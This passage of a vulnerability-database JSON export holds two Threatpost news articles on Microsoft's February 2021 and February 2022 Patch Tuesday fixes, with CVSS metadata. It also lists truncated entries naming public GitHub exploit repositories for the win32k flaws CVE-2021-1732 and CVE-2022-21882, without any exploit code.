[CVE-2022-21995](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21995>) \u2013 **Windows Hyper-V Remote Code Execution Vulnerability:** \u201cThis patch fixes a guest-to-host escape in Hyper-V server. Microsoft marks the CVSS exploit complexity as high here, stating an attacker, \u2018must prepare the target environment to improve exploit reliability.\u2019 Since this is the case for most exploits, it\u2019s not clear how this vulnerability is different. If you rely on Hyper-V servers in your enterprise, it\u2019s recommended to treat this as a critical update.\u201d\n * [CVE-2022-22005](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22005>) \u2013 **Microsoft SharePoint Server Remote Code Execution Vulnerability:** \u201cThis patch fixes a bug in SharePoint Server that could allow an authenticated user to execute any arbitrary .NET code on the server under the context and permissions of the service account of SharePoint Web Application. An attacker would need \u2018Manage Lists\u2019 permissions to exploit this, by default, authenticated users are able to create their own sites and, in this case, the user will be the owner of this site and will have all necessary permissions.\u201d\n\nTenable\u2019s Narang also pointed out that Microsoft also patched four elevation-of-privilege vulnerabilities in its Windows Print Spooler, including two rated \u201cexploitation more likely.\u201d\n\n\u201cOne of these two flaws, CVE-2022-21999, is credited to researchers at Sangfor, who were responsible for disclosing some of the [PrintNightmare](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) vulnerabilities last summer,\u201d Narang observed. \u201cBecause of the ubiquity of Print Spooler, vulnerabilities like this have been leveraged by ransomware groups.\u201d\n\n## Also of Note: A Dusty Old-Timer\n\nDanny Kim, principal architect at Virsec, noted that he found it interesting that Microsoft [republished](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2013-3900>) a CVE from 2013 to notify customers that an update to Windows 10/11 is available that addresses the original CVE.\n\n\u201cThe CVE allows an attacker to inject malicious code into a signed application without invalidating the file\u2019s original signature,\u201d he explained in an email to Threatpost on Tuesday. \u201cIn Windows, signatures are used to verify that a file has not been modified since it was released by the original vendor. With the ability to inject malicious code into \u2018verified\u2019 applications, the attacker can gain complete control over a system especially if the user who runs the application has administrative privileges.\u201d_ _\n\nHe said that the attacker can go as far as creating new user accounts with full access, allowing the attacker to login to the machine at will.\n\nThough the CVE is originally from 2013, it highlights two concerning facts, he said: \u201cPatching is a slow-moving solution, and applications need to be monitored at all times. Patching is a post-attack solution that moves too slowly to keep up with today\u2019s attacks. Applications, even verified ones, cannot just be checked when they start execution \u2013 their behavior throughout the lifetime of the application needs to be monitored and verified against expected behavior.\u201d\n\n## Apply Patches ASAP\n\nIn spite of the fact that there were no critical CVEs nor active exploits called out in the February Patch Tuesday release, security pros recommended, as they always do, that the patches should be applied as soon as possible.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-08T20:24:17", "type": "threatpost", "title": "No Critical Bugs for Microsoft February 2022 Patch Tuesday, 1 Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3900", "CVE-2021-44228", "CVE-2022-21882", "CVE-2022-21984", "CVE-2022-21989", "CVE-2022-21995", "CVE-2022-21999", "CVE-2022-22005", "CVE-2022-23280"], "modified": "2022-02-08T20:24:17", "id": "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "href": "https://threatpost.com/microsoft-february-patch-tuesday-zero-day/178286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-09T22:45:30", "description": "Microsoft has addressed nine critical-severity cybersecurity bugs in February\u2019s Patch Tuesday updates, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nSix of the security holes \u2013 including one of the critical bugs \u2013 were already publicly disclosed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOverall, the computing giant has released patches for 56 CVEs covering Microsoft Windows components, the .NET Framework, Azure IoT, Azure Kubernetes Service, Microsoft Edge for Android, Exchange Server, Office and Office Services and Web Apps, Skype for Business and Lync, and Windows Defender.\n\n## **Actively Exploited Security Bug in Windows Kernel**\n\nThe security bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>)** **is being actively exploited, according to Microsoft\u2019s advisory. It carries a vulnerability-severity rating of 7.8 on the CVSS scale, making it important in severity \u2013 however, researchers said it deserves attention above some of the critical bugs in terms of patching priority.\n\nIt exists in the Windows Win32k operating system kernel and is an elevation-of-privilege (EoP) vulnerability. It would allow a logged-on user to execute code of their choosing with higher privileges, by running a specially crafted application. If successful, attackers could execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted on the compromised machine.\n\n\u201cThe vulnerability affects Windows 10 and corresponding server editions of the Windows OS,\u201d said Chris Goettl, senior director of product management and security at Ivanti. \u201cThis is a prime example of why risk-based prioritization is so important. If you base your prioritization off of vendor severity and focus on \u2018critical\u2019 you could have missed this vulnerability in your prioritization. This vulnerability should put Windows 10 and Server 2016 and later editions into your priority bucket for remediation this month.\u201d\n\n## **Critical Microsoft Bugs for February Patch Tuesday**\n\nNone of the critical bugs rate more than an 8.8 (out of 10) on the CVSS scale, but all allow for remote code execution (RCE) and many should take top priority, according to security researchers.\n\n * ### Publicly Known .NET Core/Visual Studio Bug\n\nFor instance, the bug tracked as [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) exists in .NET Core and Visual Studio \u2013 it\u2019s the only critical-rated bug to be listed as publicly known.\n\n\u201cWithout more information from Microsoft, that\u2019s about all we know about it,\u201d said Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, in [an analysis](<https://www.zerodayinitiative.com/blog/2021/2/9/the-february-2022-security-update-review>) released Tuesday. \u201cBased on the CVSS severity scale, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.\u201d\n\n * ### **Windows Fax Bugs**\n\nOther critical bugs should be on researchers\u2019 radars. The bugs tracked as [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) meanwhile are both Windows Fax Service RCE problems.\n\n\u201cWindows Fax Service specifies settings for faxes, including how they are sent, received, viewed and printed,\u201d said Eric Feldman, senior product marketing manager at Automox. \u201cThe Windows Fax Service is used by the Windows Fax and Scan application included in all versions of Microsoft Windows 7, Windows 8 and Windows 10 and some earlier versions.\u201d\n\nAn attacker who successfully exploited either vulnerability could take control of an affected system, and then be able to install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Feldman said. \u201cEven if you do not use Windows Fax and Scan, the Windows Fax Services is enabled by default.\u201d\n\n * ### **Critical TCP/IP Bugs**\n\n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) are both Windows TCP/IP RCE vulnerabilities. The former is found in the way Windows handles iPv4 source routing; the latter is found in the way Windows handles iPv6 packet reassembly.\n\n\u201cIPv4 source routing\u2026should be disabled by default,\u201d said Childs. \u201cYou can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.\u201d\n\nResearchers said that both these patches should be prioritized.\n\n\u201cBecause these affect the network stack, require zero interaction from a user and can be exploited by sending malicious network traffic to a device, it\u2019s only a matter of time before we see attackers leveraging these vulnerabilities to carry out cyberattacks,\u201d Chris Hass, director of information security and research at Automox, said.\n\nKevin Breen, director of cyber threat research at Immersive Labs, said that the IPv6 security hole is an obvious target for hackers.\n\n\u201cCVE-2021-24094 would be an obvious target because it affects a network stack, which typically operates with system level permissions and could therefore gain an attacker a system shell,\u201d he said. \u201cAs an IPV6 Link local attack it would require the threat actor to already have a foothold in your network, but could ultimately lead to a high level of access on domain controllers, for example. This vulnerability would be most dangerous to those who operate a flat network. Segmentation will help with mitigation.\u201d\n\nBreen also pointed out that RCE isn\u2019t the only possible outcome of an exploit for this bug.\n\n\u201cThe release notes indicate that the exploit is \u2018complex\u2019 \u2013 which means attempted attacks may serve to cause systems to crash, giving it the potential to be used in a denial-of-service attack,\u201d he said.\n\n * ### **Flaw in Windows Codec Pack**\n\nWindows Camera Codec Pack is home to yet another critical RCE bug ([CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>)). If successfully exploited, an attacker could run arbitrary code in the context of the current user.\n\n\u201cIf the current user is logged on with admin privileges, the attacker could gain control of the affected system,\u201d said Justin Knapp, senior product marketing manager at Automox. \u201cThis could enable an attacker to install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of the vulnerability requires the user to open a specially crafted file with an affected version of the codec pack. While there\u2019s no way to force a user to open the file, bad actors could manipulate a user through an email or web-based attack vector where the user is effectively convinced or enticed into opening the malicious file.\u201d\n\n * ### **Windows DNS Problems**\n\nAnd Windows Domain Name System (DNS) servers, when they fail to properly handle requests, are also open to a critical RCE bug ([CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>)) that could allow an attacker to run arbitrary code in the context of the Local System Account.\n\n\u201cOnly Windows servers that are configured as DNS servers are at risk of having this vulnerability exploited,\u201d Knapp said. \u201cTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to the Windows DNS server. Given the low level of attack complexity and \u2018exploitation more likely\u2019 label assigned, this is a vulnerability that should be addressed immediately.\u201d\n\n * ### **Windows Print Spooler**\n\nAlso of note, _[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>)_ affects the Windows Local Spooler, which is an important component within the Windows operating system that stores print jobs in memory until the printer is ready to accept them.\n\nIt\u2019s a bug that \u201ccould be a big concern,\u201d according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cThis vulnerability impacts Windows 7 to 10 and Windows Server 2008 to 2019,\u201d he said. \u201cWindows Print Spooler vulnerabilities have been widely exploited in the wild going back to the days of Stuxnet. Just last year CVE-2020-0986 was seen by Kaspersky being [widely exploited in the wild.](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>)\u201d\n\n * ### **Other Critical February 2021 Microsoft Bugs**\n\nAnd finally, .NET Core for Linux is also at risk for RCE ([CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>)); and [CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) is a critical RCE vulnerability in the Windows graphic component. Details are scant for both, but of the latter, Breen said, \u201cThis is the kind of vulnerability built into exploit kits and triggered by low level phishing campaigns targeting users en masse.\u201d\n\nAnd, a critical bug that would allow RCE exists in the Microsoft Windows Codecs Library ([CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>)). Details are sparse, but Microsoft said that the difficulty required for exploitation is considered to be low. However, end-user interaction is required for successful exploitation.\n\n### **Publicly Disclosed Bugs of Note**\n\nOutside of the critical issues, [CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) is a high-severity EoP vulnerability discovered to be impacting Sysinternals PsExec utility that deserves a look. It\u2019s listed as being publicly disclosed.\n\n\u201cPsExec which has been popular in the past for use in remote administration tasks such as patching remote systems, has also had a fair share of scrutiny due the utility\u2019s weaponization by criminals in malware,\u201d Nicholas Colyer, senior product marketing manager at Automox, said via email. \u201cProof-of-concept code has not been independently verified but it is notable that in January 2021, Microsoft released a patch to resolve a remote code-execution vulnerability for the same utility, indicating that it is getting attention. Robust endpoint management is necessary for any organization\u2019s continued success and it is advisable to consider alternatives in the modern era of software-as-a-service.\u201d\n\nThe other publicly reported vulnerabilities this month are [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), an EoP vulnerability in Windows Installer; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), a DoS vulnerability in the Windows Console Driver; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information-disclosure vulnerability in Windows DirectX; and [CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>), a .NET Core and Visual Studio DoS problem.\n\n## **Zerologon Redux**\n\nMicrosoft also again released the patch for the Netlogon vulnerability (CVE-2020-1472), which originally was resolved in August. The vulnerability has [consistently been exploited](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) by threat actors, so the re-release serves to highlight its importance. Microsoft also starting Tuesday [began blocking by default](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) any vulnerable connections on devices that could be used to exploit the flaw. It does this by enabling domain controller \u201cenforcement mode.\u201d\n\n\u201cWhen you consider that Zerologon led the U.S. government to issue an Emergency Directive to all federal agencies to promptly apply the patches for this vulnerability, you start to understand the gravity of the situation,\u201d Satnam Narang, staff research engineer at Tenable, told Threatpost. \u201cZerologon provides attackers a reliable way to move laterally once inside a network, giving them the ability to impersonate systems, alter passwords, and gain control over the proverbial keys to the kingdom via the domain controller itself.\u201d\n\nHe added, \u201cFor these reasons, Zerologon has been rolled into attacker playbooks, becoming a feather in the cap for post-compromise activity. We\u2019ve also seen reports of Zerologon being favored by ransomware groups like Ryuk during their campaigns.\u201d\n\n## **What Should IT Patch First?**\n\n\u201cWindows OS updates and [Adobe Acrobat and Reader](<https://threatpost.com/critical-adobe-windows-flaw/163789/>) need immediate attention with the list of exploited and publicly disclosed vulnerabilities,\u201d said Goettl.\n\nAfter that, development tools and IT tools \u201cneed some attention,\u201d he added.\n\n\u201c.Net Core and PsExec disclosures are a concern that should not go unaddressed. Because this development and IT tools do not follow the same update process as OS and application updates, it is important to review your DevOps processes and determine if you are able to detect and respond to updates for common dev components,\u201d he said. \u201cFor tools like PsExec it is important to understand your software inventory and where these tools are installed and ensure you can distribute updated versions as needed.\u201d\n\n**_Is your business an easy mark? _**_Save your spot for \u201c15 Cybersecurity Gaffes SMBs Make,\u201d **a **_**[_FREE Threatpost webinar_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>) **_**on Feb. 24 at 2 p.m. ET.** Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. __[Register here](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)__ for the Wed., Feb. 24 LIVE webinar. _\n", "cvss3": {}, "published": "2021-02-09T22:33:08", "type": "threatpost", "title": "Actively Exploited Windows Kernel Bug Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1472", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-24112", "CVE-2021-26701"], "modified": "2021-02-09T22:33:08", "id": "THREATPOST:1502920D4F50B0D128077B515815C023", "href": "https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T07:51:24", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-17...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T03:44:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T04:45:33", "id": "1C45657B-E388-5668-9093-F3934858B728", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T20:28:07", "description": "# CVE-2021-1732\n\nWin32k Elevation Of Privileges\n\nTechni...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T16:55:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-15T17:00:00", "id": "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-18T17:21:09", "description": "# CVE-2022-21882\n\nWin32k Elevation...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T11:25:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2023-02-18T13:48:44", "id": "9C08AAB4-D76D-550C-ADA2-175E9AC92E38", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-22T17:42:31", "description": "# cve-2022-21882-poc\nlpe poc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T03:45:36", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882"], "modified": "2023-03-22T16:29:24", "id": "7F49BA75-ECD5-5933-8F39-585255092893", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:37:09", "description": "# CVE-2021-1732\n\n- \u6f0f\u6d1e\u53d1\u751f\u5728Windows \u56fe\u5f62\u9a71\u52a8`win32kfull!NtUserCreateWind...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T01:28:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-11-08T01:36:42", "id": "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T12:50:14", "description": "# CVE-2021-1732-Exploit\nCVE-2021-1...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T01:35:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-12-18T11:55:36", "id": "1D0AAF42-5E68-5985-A800-90937D55628D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:32:27", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T02:13:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-02-16T09:53:06", "id": "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-13T10:29:32", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T05:07:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, 